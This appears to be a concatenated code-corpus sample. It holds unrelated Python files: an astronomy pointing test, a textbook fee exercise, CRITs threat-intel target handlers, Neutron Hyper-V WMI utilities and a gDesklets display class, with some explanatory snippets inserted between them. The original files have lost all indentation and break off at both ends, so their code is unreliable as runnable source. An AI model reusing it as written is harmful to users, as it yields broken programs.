# Is the jitter distribution centered on zero?
assert np.abs(np.mean(alpha)) * 3600. < 0.01
# Is the spread about the requested 1 arcsec?
assert np.std(np.rad2deg(alpha)) > (0.9 / 3600.)
assert np.std(np.rad2deg(alpha)) < (1.1 / 3600.)
# Does it affect y and z independently?
coeff, p = pearsonr(p_fixed['dir'][:, 1] - p_jitter['dir'][:, 1],
p_fixed['dir'][:, 2] - p_jitter['dir'][:, 2])
assert abs(coeff) < 0.01
@pytest.mark.parametrize('pointing', [FixedPointing, JitterPointing])
def test_polarization_perpendicular(pointing):
'''Consistency: Polarization vector must always be perpendicular to dir.'''
s = PointSource(coords=SkyCoord(0., 0., unit='deg'))
photons = s.generate_photons(10)
photons['ra'] = np.random.uniform(0, 360., len(photons))
# Exclude +-90 deg, because the poles are not handled well
photons['dec'] = np.random.uniform(-89.9, 89.9, len(photons))
photons['polangle'] = np.random.uniform(0, 360., len(photons))
point_x = FixedPointing(coords=SkyCoord(187.4, 0., unit='deg'))
p_x = point_x(photons.copy())
assert np.allclose(np.einsum('ij,ij->i', p_x['dir'].data,
p_x['polarization'].data), 0)
| hamogu/marxs | marxs/source/tests/test_pointing.py | Python | gpl-3.0 | 5,596 |
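The final assertion above reduces to a batched dot product via `np.einsum`. The following self-contained sketch builds random unit direction vectors, constructs polarization vectors perpendicular to them, and runs the same check on plain NumPy arrays (no marxs objects involved):

```python
import numpy as np

rng = np.random.default_rng(0)
n = 1000
# Random unit direction vectors.
d = rng.normal(size=(n, 3))
d /= np.linalg.norm(d, axis=1, keepdims=True)
# Polarization vectors: project a random vector onto the plane orthogonal
# to each direction and normalize the result.
p = rng.normal(size=(n, 3))
p -= np.einsum('ij,ij->i', p, d)[:, None] * d
p /= np.linalg.norm(p, axis=1, keepdims=True)
# Row-wise dot products must vanish, as asserted in the test above.
assert np.allclose(np.einsum('ij,ij->i', d, p), 0)
print("all polarization vectors are perpendicular to dir")
```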
def main():
shour = float(raw_input("Enter the starting hours "))
smin = float(raw_input("Enter the starting minutes "))
ehour = float(raw_input("Enter the ending hours "))
emin = float(raw_input("Enter the ending minutes: "))
cperiodh = ehour-shour
cperiodm = emin -smin
cperiodm1 = cperiodm / 60
fperiod = cperiodh + cperiodm1
if ehour < 9:
charge = fperiod * 2.50
print "Your payable ammount is %f " %(charge)
if ehour >= 9:
shour1 = (9-(shour + (smin / 60)))
ehour1 = ((ehour + (emin / 60)-9))
fcharge1 = (shour1* 2.50 )+ (ehour1 * 1.75)
print "Your payable amount is %f" %(fcharge1)
main()
| sai29/Python-John-Zelle-book | Chapter_7/7.py | Python | mit | 686 |
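The exercise above charges $2.50 per hour before 9 o'clock and $1.75 per hour afterwards, reading times with Python 2's `raw_input`. A Python 3 restatement of the same fee calculation as a pure function, which also guards the case where the sitter starts after 9 (the sample call is made up):

```python
def babysitting_fee(start_hour, start_min, end_hour, end_min):
    """Charge $2.50/hour before 9:00 and $1.75/hour from 9:00 on."""
    start = start_hour + start_min / 60
    end = end_hour + end_min / 60
    if end < 9:
        return (end - start) * 2.50
    before_nine = max(9 - start, 0)
    after_nine = end - max(start, 9)
    return before_nine * 2.50 + after_nine * 1.75

print(babysitting_fee(6, 0, 10, 30))  # 3h * 2.50 + 1.5h * 1.75 -> 10.125
```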
import json
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.template import RequestContext
from mongoengine.base import ValidationError
from crits.core import form_consts
from crits.core.crits_mongoengine import json_handler, EmbeddedCampaign
from crits.core.handlers import jtable_ajax_list, build_jtable, jtable_ajax_delete
from crits.core.handlers import csv_export
from crits.core.user_tools import is_user_subscribed, user_sources
from crits.core.user_tools import is_user_favorite
from crits.emails.email import Email
from crits.services.handlers import run_triage
from crits.stats.handlers import target_user_stats
from crits.targets.division import Division
from crits.targets.forms import TargetInfoForm
from crits.targets.target import Target
def generate_target_csv(request):
"""
Generate a CSV file of the Target information
:param request: The request for this CSV.
:type request: :class:`django.http.HttpRequest`
:returns: :class:`django.http.HttpResponse`
"""
response = csv_export(request,Target)
return response
def upsert_target(data, analyst):
"""
Add/update target information.
:param data: The target information.
:type data: dict
:param analyst: The user adding the target.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str)
"""
if 'email_address' not in data:
return {'success': False,
'message': "No email address to look up"}
# check for exact match first
target = Target.objects(email_address=data['email_address']).first()
if not target: # if no exact match, look for case-insensitive match
target = Target.objects(email_address__iexact=data['email_address']).first()
is_new = False
if not target:
is_new = True
target = Target()
target.email_address = data['email_address'].strip().lower()
bucket_list = False
ticket = False
if 'department' in data:
target.department = data['department']
if 'division' in data:
target.division = data['division']
if 'organization_id' in data:
target.organization_id = data['organization_id']
if 'firstname' in data:
target.firstname = data['firstname']
if 'lastname' in data:
target.lastname = data['lastname']
if 'note' in data:
target.note = data['note']
if 'title' in data:
target.title = data['title']
if 'campaign' in data and 'camp_conf' in data:
target.add_campaign(EmbeddedCampaign(name=data['campaign'],
confidence=data['camp_conf'],
analyst=analyst))
if 'bucket_list' in data:
bucket_list = data.get(form_consts.Common.BUCKET_LIST_VARIABLE_NAME)
if 'ticket' in data:
ticket = data.get(form_consts.Common.TICKET_VARIABLE_NAME)
if bucket_list:
target.add_bucket_list(bucket_list, analyst)
if ticket:
target.add_ticket(ticket, analyst)
try:
target.save(username=analyst)
target.reload()
if is_new:
run_triage(target, analyst)
return {'success': True,
'message': "Target saved successfully",
'id': str(target.id)}
except ValidationError, e:
return {'success': False,
'message': "Target save failed: %s" % e}
def remove_target(email_address=None, analyst=None):
"""
Remove a target.
:param email_address: The email address of the target to remove.
:type email_address: str
:param analyst: The user removing the target.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str)
"""
if not email_address:
return {'success': False,
'message': "No email address to look up"}
target = Target.objects(email_address=email_address).first()
if not target:
return {'success': False,
'message': "No target matching this email address."}
target.delete(username=analyst)
return {'success': True,
'message': "Target removed successfully"}
def get_target_details(email_address, analyst):
"""
Generate the data to render the Target details template.
:param email_address: The email address of the target.
:type email_address: str
:param analyst: The user requesting this information.
:type analyst: str
:returns: template (str), arguments (dict)
"""
template = None
if not email_address:
template = "error.html"
args = {'error': "Must provide an email address."}
return template, args
# check for exact match first
target = Target.objects(email_address=email_address).first()
if not target: # if no exact match, look for case-insensitive match
target = Target.objects(email_address__iexact=email_address).first()
if not target:
target = Target()
target.email_address = email_address.strip().lower()
form = TargetInfoForm(initial={'email_address': email_address})
email_list = target.find_emails(analyst)
form = TargetInfoForm(initial=target.to_dict())
if form.fields.get(form_consts.Common.BUCKET_LIST_VARIABLE_NAME) != None:
form.fields.pop(form_consts.Common.BUCKET_LIST_VARIABLE_NAME)
if form.fields.get(form_consts.Common.TICKET_VARIABLE_NAME) != None:
form.fields.pop(form_consts.Common.TICKET_VARIABLE_NAME)
subscription = {
'type': 'Target',
'id': target.id,
'subscribed': is_user_subscribed("%s" % analyst,
'Target',
target.id)
}
#objects
objects = target.sort_objects()
#relationships
relationships = target.sort_relationships("%s" % analyst,
meta=True)
# relationship
relationship = {
'type': 'Target',
'value': target.id
}
#comments
if target.id:
comments = {'comments': target.get_comments(),
'url_key': email_address}
else:
comments = {'comments': [],
'url_key': email_address}
#screenshots
screenshots = target.get_screenshots(analyst)
# favorites
favorite = is_user_favorite("%s" % analyst, 'Target', target.id)
# analysis results
service_results = target.get_analysis_results()
args = {'objects': objects,
'relationships': relationships,
'relationship': relationship,
'comments': comments,
'favorite': favorite,
'subscription': subscription,
'screenshots': screenshots,
'email_list': email_list,
'target_detail': target,
'service_results': service_results,
'form': form}
return template, args
def get_campaign_targets(campaign, user):
"""
Get targets related to a specific campaign.
:param campaign: The campaign to search for.
:type campaign: str
:param user: The user requesting this information.
:type user: str
:returns: list
"""
# Searching for campaign targets
sourcefilt = user_sources(user)
# Get addresses from the 'to' field of emails attributed to this campaign
emails = Email.objects(source__name__in=sourcefilt,
campaign__name=campaign).only('to')
addresses = {}
for email in emails:
for to in email['to']:
addresses[to.strip().lower()] = 1 # add the way it should be
addresses[to] = 1 # also add the way it is in the Email
# Get addresses of Targets attributed to this campaign
targets = Target.objects(campaign__name=campaign).only('email_address')
for target in targets:
addresses[target.email_address] = 1
uniq_addrs = addresses.keys()
return uniq_addrs
def generate_target_jtable(request, option):
"""
Generate the jtable data for rendering in the list template.
:param request: The request for this jtable.
:type request: :class:`django.http.HttpRequest`
:param option: Action to take.
:type option: str of either 'jtlist', 'jtdelete', or 'inline'.
:returns: :class:`django.http.HttpResponse`
"""
refresh = request.GET.get("refresh", "no")
if refresh == "yes":
target_user_stats()
obj_type = Target
type_ = "target"
mapper = obj_type._meta['jtable_opts']
if option == "jtlist":
# Handle campaign listings
query = {}
if "campaign" in request.GET:
campaign = request.GET.get("campaign",None)
emails = get_campaign_targets(campaign, request.user.username)
query = {"email_address":{"$in": emails}}
# Sets display url
details_url = mapper['details_url']
details_url_key = mapper['details_url_key']
fields = mapper['fields']
response = jtable_ajax_list(obj_type, details_url, details_url_key,
request, includes=fields, query=query)
return HttpResponse(json.dumps(response,
default=json_handler),
content_type="application/json")
if option == "jtdelete":
response = {"Result": "ERROR"}
if jtable_ajax_delete(obj_type,request):
response = {"Result": "OK"}
return HttpResponse(json.dumps(response,
default=json_handler),
content_type="application/json")
jtopts = {
'title': "Targets",
'default_sort': mapper['default_sort'],
'listurl': reverse('crits.%ss.views.%ss_listing' %
(type_, type_), args=('jtlist',)),
'deleteurl': reverse('crits.%ss.views.%ss_listing' %
(type_, type_), args=('jtdelete',)),
'searchurl': reverse(mapper['searchurl']),
'fields': mapper['jtopts_fields'],
'hidden_fields': mapper['hidden_fields'],
'linked_fields': mapper['linked_fields'],
'details_link': mapper['details_link'],
'no_sort': mapper['no_sort']
}
jtable = build_jtable(jtopts,request)
jtable['toolbar'] = [
{
'tooltip': "'All Targets'",
'text': "'All'",
'click': "function () {$('#target_listing').jtable('load', {'refresh': 'yes'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'New Targets'",
'text': "'New'",
'click': "function () {$('#target_listing').jtable('load', {'refresh': 'yes', 'status': 'New'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'In Progress Targets'",
'text': "'In Progress'",
'click': "function () {$('#target_listing').jtable('load', {'refresh': 'yes', 'status': 'In Progress'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'Analyzed Targets'",
'text': "'Analyzed'",
'click': "function () {$('#target_listing').jtable('load', {'refresh': 'yes', 'status': 'Analyzed'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'Deprecated Targets'",
'text': "'Deprecated'",
'click': "function () {$('#target_listing').jtable('load', {'refresh': 'yes', 'status': 'Deprecated'});}",
'cssClass': "'jtable-toolbar-center'",
},
{
'tooltip': "'Refresh target stats'",
'text': "'Refresh'",
'click': "function () {$.get('"+reverse('crits.%ss.views.%ss_listing' % (type_,type_))+"', {'refresh': 'yes'}); $('target_listing').jtable('load');}",
},
{
'tooltip': "'Add Target'",
'text': "'Add Target'",
'click': "function () {$('#new-target').click()}",
},
]
if option == "inline":
return render_to_response("jtable.html",
{'jtable': jtable,
'jtid': '%s_listing' % type_,
'button' : '%ss_tab' % type_},
RequestContext(request))
else:
return render_to_response("%s_listing.html" % type_,
{'jtable': jtable,
'jtid': '%s_listing' % type_},
RequestContext(request))
def generate_division_jtable(request, option):
"""
Generate the jtable data for rendering in the list template.
:param request: The request for this jtable.
:type request: :class:`django.http.HttpRequest`
:param option: Action to take.
:type option: str of either 'jtlist', 'jtdelete', or 'inline'.
:returns: :class:`django.http.HttpResponse`
"""
refresh = request.GET.get("refresh", "no")
if refresh == "yes":
target_user_stats()
if option == "jtlist":
limit = int(request.GET.get('jtPageSize',25))
skip = int(request.GET.get('jtStartIndex',0))
response = {}
response['Result'] = "OK"
fields = ["division","email_count","id","schema_version"]
response['TotalRecordCount'] = Division.objects().count()
response['Records'] = Division.objects().skip(skip).limit(limit).\
order_by("-email_count").only(*fields).to_dict()
#response['Records'] = [d.to_dict() for d in response['Records']]
return HttpResponse(json.dumps(response,
default=json_handler),
content_type="application/json")
type_ = "division"
jtopts = {
'title': "Divisions",
'default_sort': "email_count DESC",
'listurl': reverse('crits.targets.views.%ss_listing' % (type_,),
args=('jtlist',)),
'deleteurl': None,
'searchurl': None,
'fields': ["division","email_count","id"],
'hidden_fields': ["_id"],
'linked_fields': []
}
jtable = build_jtable(jtopts,request)
jtable['toolbar'] = [
{
'tooltip': "'Refresh division stats'",
'text': "'Refresh'",
'click': "function () {$.get('"+reverse('crits.targets.views.%ss_listing' % (type_))+"', {'refresh': 'yes'}); $('target_listing').jtable('load');}",
},
]
if option == "inline":
return render_to_response("jtable.html",
{'jtable': jtable,
'jtid': '%s_listing' % type_,
'button' : '%ss_tab' % type_},
RequestContext(request))
else:
return render_to_response("%s_listing.html" % type_,
{'jtable': jtable,
'jtid': '%s_listing' % type_},
RequestContext(request))
| kaoscoach/crits | crits/targets/handlers.py | Python | mit | 15,290 |
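`upsert_target` above follows a common pattern: exact lookup, case-insensitive fallback, create on miss, then copy over only the fields that were supplied. A database-free sketch of that pattern using a plain dict as the store (the function and field names here are illustrative, not the CRITs API):

```python
def upsert_record(store, data):
    """Insert or update a record keyed by a normalized email address."""
    if "email_address" not in data:
        return {"success": False, "message": "No email address to look up"}
    key = data["email_address"].strip().lower()
    # Exact key first, then the normalized (case-insensitive) key, as above.
    record = store.get(data["email_address"]) or store.get(key)
    is_new = record is None
    if is_new:
        record = {"email_address": key}
    # Copy over only the fields that were actually supplied.
    for field in ("department", "division", "firstname", "lastname", "note", "title"):
        if field in data:
            record[field] = data[field]
    store[key] = record
    return {"success": True, "message": "created" if is_new else "updated"}

store = {}
print(upsert_record(store, {"email_address": "Alice@Example.COM", "firstname": "Alice"}))
print(upsert_record(store, {"email_address": "alice@example.com", "note": "updated later"}))
```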
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Cloudbase Solutions SRL
# Copyright 2013 Pedro Navarro Perez
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: Pedro Navarro Perez
# @author: Alessandro Pilotti, Cloudbase Solutions Srl
import sys
import time
from oslo.config import cfg
from neutron.common import exceptions as q_exc
from neutron.openstack.common import log as logging
# Check needed for unit testing on Unix
if sys.platform == 'win32':
import wmi
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class HyperVException(q_exc.NeutronException):
message = _('HyperVException: %(msg)s')
WMI_JOB_STATE_STARTED = 4096
WMI_JOB_STATE_RUNNING = 4
WMI_JOB_STATE_COMPLETED = 7
class HyperVUtils(object):
_ETHERNET_SWITCH_PORT = 'Msvm_SwitchPort'
_wmi_namespace = '//./root/virtualization'
def __init__(self):
self._wmi_conn = None
@property
def _conn(self):
if self._wmi_conn is None:
self._wmi_conn = wmi.WMI(moniker=self._wmi_namespace)
return self._wmi_conn
def get_switch_ports(self, vswitch_name):
vswitch = self._get_vswitch(vswitch_name)
vswitch_ports = vswitch.associators(
wmi_result_class=self._ETHERNET_SWITCH_PORT)
return set(p.Name for p in vswitch_ports)
def vnic_port_exists(self, port_id):
try:
self._get_vnic_settings(port_id)
except Exception:
return False
return True
def get_vnic_ids(self):
return set(
p.ElementName
for p in self._conn.Msvm_SyntheticEthernetPortSettingData()
if p.ElementName is not None)
def _get_vnic_settings(self, vnic_name):
vnic_settings = self._conn.Msvm_SyntheticEthernetPortSettingData(
ElementName=vnic_name)
if not vnic_settings:
raise HyperVException(msg=_('Vnic not found: %s') % vnic_name)
return vnic_settings[0]
def connect_vnic_to_vswitch(self, vswitch_name, switch_port_name):
vnic_settings = self._get_vnic_settings(switch_port_name)
if not vnic_settings.Connection or not vnic_settings.Connection[0]:
port = self.get_port_by_id(switch_port_name, vswitch_name)
if port:
port_path = port.Path_()
else:
port_path = self._create_switch_port(
vswitch_name, switch_port_name)
vnic_settings.Connection = [port_path]
self._modify_virt_resource(vnic_settings)
def _get_vm_from_res_setting_data(self, res_setting_data):
sd = res_setting_data.associators(
wmi_result_class='Msvm_VirtualSystemSettingData')
vm = sd[0].associators(
wmi_result_class='Msvm_ComputerSystem')
return vm[0]
def _modify_virt_resource(self, res_setting_data):
vm = self._get_vm_from_res_setting_data(res_setting_data)
vs_man_svc = self._conn.Msvm_VirtualSystemManagementService()[0]
(job_path, ret_val) = vs_man_svc.ModifyVirtualSystemResources(
vm.Path_(), [res_setting_data.GetText_(1)])
self._check_job_status(ret_val, job_path)
def _check_job_status(self, ret_val, jobpath):
"""Poll WMI job state for completion."""
if not ret_val:
return
elif ret_val not in [WMI_JOB_STATE_STARTED, WMI_JOB_STATE_RUNNING]:
raise HyperVException(msg=_('Job failed with error %d') % ret_val)
job_wmi_path = jobpath.replace('\\', '/')
job = wmi.WMI(moniker=job_wmi_path)
while job.JobState == WMI_JOB_STATE_RUNNING:
time.sleep(0.1)
job = wmi.WMI(moniker=job_wmi_path)
if job.JobState != WMI_JOB_STATE_COMPLETED:
job_state = job.JobState
if job.path().Class == "Msvm_ConcreteJob":
err_sum_desc = job.ErrorSummaryDescription
err_desc = job.ErrorDescription
err_code = job.ErrorCode
data = {'job_state': job_state,
'err_sum_desc': err_sum_desc,
'err_desc': err_desc,
'err_code': err_code}
raise HyperVException(
msg=_("WMI job failed with status %(job_state)d. "
"Error details: %(err_sum_desc)s - %(err_desc)s - "
"Error code: %(err_code)d") % data)
else:
(error, ret_val) = job.GetError()
if not ret_val and error:
data = {'job_state': job_state,
'error': error}
raise HyperVException(
msg=_("WMI job failed with status %(job_state)d. "
"Error details: %(error)s") % data)
else:
raise HyperVException(
msg=_("WMI job failed with status %d. "
"No error description available") % job_state)
desc = job.Description
elap = job.ElapsedTime
LOG.debug(_("WMI job succeeded: %(desc)s, Elapsed=%(elap)s"),
{'desc': desc, 'elap': elap})
def _create_switch_port(self, vswitch_name, switch_port_name):
"""Creates a switch port."""
switch_svc = self._conn.Msvm_VirtualSwitchManagementService()[0]
vswitch_path = self._get_vswitch(vswitch_name).path_()
(new_port, ret_val) = switch_svc.CreateSwitchPort(
Name=switch_port_name,
FriendlyName=switch_port_name,
ScopeOfResidence="",
VirtualSwitch=vswitch_path)
if ret_val != 0:
raise HyperVException(
msg=_('Failed creating port for %s') % vswitch_name)
return new_port
def disconnect_switch_port(
self, vswitch_name, switch_port_name, delete_port):
"""Disconnects the switch port."""
switch_svc = self._conn.Msvm_VirtualSwitchManagementService()[0]
switch_port_path = self._get_switch_port_path_by_name(
switch_port_name)
if not switch_port_path:
# Port not found. It happens when the VM was already deleted.
return
(ret_val, ) = switch_svc.DisconnectSwitchPort(
SwitchPort=switch_port_path)
if ret_val != 0:
data = {'switch_port_name': switch_port_name,
'vswitch_name': vswitch_name,
'ret_val': ret_val}
raise HyperVException(
msg=_('Failed to disconnect port %(switch_port_name)s '
'from switch %(vswitch_name)s '
'with error %(ret_val)s') % data)
if delete_port:
(ret_val, ) = switch_svc.DeleteSwitchPort(
SwitchPort=switch_port_path)
if ret_val != 0:
data = {'switch_port_name': switch_port_name,
'vswitch_name': vswitch_name,
'ret_val': ret_val}
raise HyperVException(
msg=_('Failed to delete port %(switch_port_name)s '
'from switch %(vswitch_name)s '
'with error %(ret_val)s') % data)
def _get_vswitch(self, vswitch_name):
vswitch = self._conn.Msvm_VirtualSwitch(ElementName=vswitch_name)
if not vswitch:
raise HyperVException(msg=_('VSwitch not found: %s') %
vswitch_name)
return vswitch[0]
def _get_vswitch_external_port(self, vswitch):
vswitch_ports = vswitch.associators(
wmi_result_class=self._ETHERNET_SWITCH_PORT)
for vswitch_port in vswitch_ports:
lan_endpoints = vswitch_port.associators(
wmi_result_class='Msvm_SwitchLanEndpoint')
if lan_endpoints:
ext_port = lan_endpoints[0].associators(
wmi_result_class='Msvm_ExternalEthernetPort')
if ext_port:
return vswitch_port
def set_vswitch_port_vlan_id(self, vlan_id, switch_port_name):
vlan_endpoint_settings = self._conn.Msvm_VLANEndpointSettingData(
ElementName=switch_port_name)[0]
if vlan_endpoint_settings.AccessVLAN != vlan_id:
vlan_endpoint_settings.AccessVLAN = vlan_id
vlan_endpoint_settings.put()
def _get_switch_port_path_by_name(self, switch_port_name):
vswitch = self._conn.Msvm_SwitchPort(ElementName=switch_port_name)
if vswitch:
return vswitch[0].path_()
def get_vswitch_id(self, vswitch_name):
vswitch = self._get_vswitch(vswitch_name)
return vswitch.Name
def get_port_by_id(self, port_id, vswitch_name):
vswitch = self._get_vswitch(vswitch_name)
switch_ports = vswitch.associators(
wmi_result_class=self._ETHERNET_SWITCH_PORT)
for switch_port in switch_ports:
if (switch_port.ElementName == port_id):
return switch_port
def enable_port_metrics_collection(self, switch_port_name):
raise NotImplementedError(_("Metrics collection is not supported on "
"this version of Hyper-V"))
| ntt-sic/neutron | neutron/plugins/hyperv/agent/utils.py | Python | apache-2.0 | 9,859 |
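`_check_job_status` above polls an asynchronous WMI job until it leaves the RUNNING state and raises with whatever error detail is available. Since the `wmi` module only exists on Windows, here is a platform-neutral sketch of the same polling pattern with a stubbed job object (all names are hypothetical):

```python
import time

JOB_RUNNING, JOB_COMPLETED = 4, 7

class StubJob:
    """Stand-in for a WMI job object that finishes after a few polls."""
    def __init__(self, polls_to_finish=3):
        self._left = polls_to_finish
        self.JobState = JOB_RUNNING
        self.ErrorDescription = ""

    def refresh(self):
        self._left -= 1
        if self._left <= 0:
            self.JobState = JOB_COMPLETED

def wait_for_job(job, interval=0.01):
    # Poll until the job leaves the RUNNING state, then check the outcome,
    # mirroring the loop in _check_job_status above.
    while job.JobState == JOB_RUNNING:
        time.sleep(interval)
        job.refresh()
    if job.JobState != JOB_COMPLETED:
        raise RuntimeError("job failed: %s" % job.ErrorDescription)

wait_for_job(StubJob())
print("job completed")
```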
from layout import Unit
from layout.LayoutObject import LayoutObject
from utils.datatypes import *
from utils.Struct import Struct
from DataTarget import DataTarget
from urllib import unquote
import utils
import gobject
import gtk
#
# Abstract class for DisplayTargets.
#
class DisplayTarget(DataTarget):
__slots__ = ('__layout_object', '_geometry_lock', '__anchor',
'__had_action', '__action_stamp', '__pushed_cursor')
# observer actions
OBS_GEOMETRY = 0
# user actions
ACTION_CLICK = "click"
ACTION_DOUBLECLICK = "doubleclick"
ACTION_PRESS = "press"
ACTION_RELEASE = "release"
ACTION_MENU = "menu"
ACTION_SCROLL = "scroll"
ACTION_ENTER = "enter"
ACTION_LEAVE = "leave"
ACTION_MOTION = "motion"
ACTION_FILE_DROP = "file-drop"
ACTION_LINK_DROP = "link-drop"
ACTION_KEY_PRESS = "key-press"
ACTION_KEY_RELEASE = "key-release"
# placement anchors
ANCHOR_NW = "nw"
ANCHOR_N = "n"
ANCHOR_NE = "ne"
ANCHOR_E = "e"
ANCHOR_SE = "se"
ANCHOR_S = "s"
ANCHOR_SW = "sw"
ANCHOR_W = "w"
ANCHOR_CENTER = "center"
# what we accept for drag & drop
__DND_FILE = [("text/uri-list", 0, 0)]
__DND_LINK = [("x-url/http", 0, 0), ("_NETSCAPE_URL", 0, 0)]
def __init__(self, name, parent):
# the action stamp helps us to detect ENTER and LEAVE events
self.__action_stamp = 0
# the queue of actions
self.__action_queue = []
# the layout object
self.__layout_object = parent.new_layout_object()
self.__layout_object.set_callback(self.__geometry_callback)
self.__layout_object.set_action_callback(self.__action_callback)
# the currently pushed mouse cursor
self.__pushed_cursor = None
# lock for geometry computations
self._geometry_lock = True
# the placement anchor
self.__anchor = self.ANCHOR_NW
# the value of the last notify_handle_action call
self.__had_action = False
DataTarget.__init__(self, name, parent)
for prop, datatype in [("x", TYPE_UNIT),
("y", TYPE_UNIT),
("width", TYPE_UNIT),
("height", TYPE_UNIT)]:
self._register_property(prop, datatype,
self._setp_geometry, self._getp_geometry)
self.set_prop("x", Unit.ZERO)
self.set_prop("y", Unit.ZERO)
self.set_prop("width", Unit.Unit())
self.set_prop("height", Unit.Unit())
self._register_property("relative-to", TYPE_LIST,
self._setp_relative_to, self._getp)
self._register_property("anchor", TYPE_STRING,
self._setp_anchor, self._getp)
self._register_property("cursor", TYPE_STRING,
self._setp_cursor, self._getp)
self._register_property("menu", TYPE_OBJECT,
self._setp_menu, None)
self._register_property("visible", TYPE_BOOL,
self._setp_visible, self._getp)
self._setp("visible", True)
for action in (self.ACTION_ENTER,
self.ACTION_LEAVE,
self.ACTION_CLICK,
self.ACTION_PRESS,
self.ACTION_RELEASE,
self.ACTION_SCROLL,
self.ACTION_FILE_DROP,
self.ACTION_LINK_DROP,
self.ACTION_DOUBLECLICK,
self.ACTION_MOTION,
self.ACTION_MENU,
self.ACTION_KEY_PRESS,
self.ACTION_KEY_RELEASE):
self._register_action(action)
#
# Creates and returns a new layout object as a child of this element's
# layout object.
#
def new_layout_object(self):
return self.__layout_object.new_child()
#
# Returns the layout object of this element.
#
def get_layout_object(self):
return self.__layout_object
#
# Callback handler for changes in the geometry.
#
def __geometry_callback(self, src, x, y, w, h):
self.get_widget().set_size_request(w.as_px(), h.as_px())
utils.request_call(self.update_observer, self.OBS_GEOMETRY)
#
# Callback handler for user actions.
#
def __action_callback(self, src, x, y, stamp, action, event):
self.detect_enter(stamp)
call = self.get_action_call(action)
if (call):
self.__action_queue.append((action, x, y, event))
utils.request_idle_call(self.__process_actions)
#
# Processes the remaining actions.
#
def __process_actions(self):
while (self.__action_queue):
action, x, y, event = self.__action_queue.pop()
self.handle_action(action, x, y, event)
#
# Detects and emits ENTER events.
#
def detect_enter(self, stamp):
if (not self.__action_stamp):
# send enter event
action = self.ACTION_ENTER
if (self.get_action_call(action)):
self.handle_action(action, Unit.ZERO, Unit.ZERO, Struct())
# change cursor
cursor = self._getp("cursor")
if (cursor):
self._get_display().push_cursor(cursor)
self.__pushed_cursor = cursor
self.__action_stamp = stamp
#
# Detects and emits LEAVE events.
#
def detect_leave(self, stamp):
if (self.__action_stamp and stamp != self.__action_stamp):
self.__action_stamp = 0
# send leave event
action = self.ACTION_LEAVE
if (self.get_action_call(action)):
self.handle_action(action, Unit.ZERO, Unit.ZERO, Struct())
# revert cursor
if (self.__pushed_cursor):
self._get_display().pop_cursor(self.__pushed_cursor)
self.__pushed_cursor = None
def _is_active(self): return (self.__action_stamp != 0)
def __on_file_drop(self, widget, context, x, y, data, info, time):
''' Catch DND events and process them to send them to the
main display, which forwards them to the sensor '''
# get the display
display = self._get_display()
# tell the main display to send files and coordinates to the sensor
files = [unquote(uri) for uri in data.data.split("\r\n") if uri != '']
display.send_action(self, self.ACTION_FILE_DROP,
Struct(files = files, _args = [files]))
def __on_link_drop(self, widget, context, x, y, data, info, time):
''' Catch DND events and process them to send them to the
main display, which forwards them to the sensor '''
# get the display
display = self._get_display()
# tell the main display to send link and coordinates to the sensor
links = [unquote(data.data.split("\n")[0])]
display.send_action(self, self.ACTION_LINK_DROP,
Struct(links = links, _args = [links]))
#
# Returns whether this target is standalone, i.e. needs no parent.
#
def is_standalone(self): return False
#
# Returns the widget of this target.
#
def get_widget(self): raise NotImplementedError
#
# Returns the true coordinates of this target when the given coordinates
# are the hotspot.
#
def get_anchored_coords(self, x, y, w, h):
assert (isinstance(x, Unit.Unit))
assert (isinstance(y, Unit.Unit))
assert (isinstance(w, Unit.Unit))
assert (isinstance(h, Unit.Unit))
if (x.is_unset() or y.is_unset()):
return (x, y)
anchor = self.__anchor
if (anchor in (self.ANCHOR_NW, self.ANCHOR_W, self.ANCHOR_SW)):
ax = x
elif (anchor in (self.ANCHOR_N, self.ANCHOR_CENTER, self.ANCHOR_S)):
ax = x - (w / 2)
else:
ax = x - w
if (anchor in (self.ANCHOR_NW, self.ANCHOR_N, self.ANCHOR_NE)):
ay = y
elif (anchor in (self.ANCHOR_W, self.ANCHOR_CENTER, self.ANCHOR_E)):
ay = y - (h / 2)
else:
ay = y - h
return (ax, ay)
#
# Returns the geometry (coordinates and size) of this target.
#
def get_geometry(self):
x, y, w, h = self.__layout_object.get_real_geometry()
if (self.get_prop("visible")):
return (x, y, w, h)
else:
return (x, y, Unit.ZERO, Unit.ZERO)
#
# Returns the geometry from the user's point of view.
#
def get_user_geometry(self):
return self.__layout_object.get_geometry() #self.__user_geometry
#
# Sets the position of this target.
#
def set_position(self, x, y):
assert (isinstance(x, Unit.Unit))
assert (isinstance(y, Unit.Unit))
ox, oy, w, h = self.__layout_object.get_geometry()
if ((x, y) != (ox, oy)):
self.__layout_object.set_geometry(x = x, y = y)
#
# Sets the size of this target. Use this instead of set_size_request() in
# targets to set the size manually.
#
def set_size(self, width, height):
assert (isinstance(width, Unit.Unit))
assert (isinstance(height, Unit.Unit))
x, y, w, h = self.__layout_object.get_geometry()
if ((w, h) != (width, height)):
if (w.get_unit() != Unit.UNIT_PERCENT):
self.__layout_object.set_geometry(width = width)
if (h.get_unit() != Unit.UNIT_PERCENT):
self.__layout_object.set_geometry(height = height)
def handle_action(self, action, px, py, event):
assert (isinstance(px, Unit.Unit))
assert (isinstance(py, Unit.Unit))
# we need the pointer position relative to the widget, so we have to
# setup a new event structure for some actions
if (action in (self.ACTION_CLICK, self.ACTION_DOUBLECLICK,
self.ACTION_MOTION, self.ACTION_PRESS,
self.ACTION_RELEASE)):
x, y = self.get_widget().get_pointer()
nil, nil, w, h = self.get_geometry()
ux = Unit.Unit(x, Unit.UNIT_PX)
uy = Unit.Unit(y, Unit.UNIT_PX)
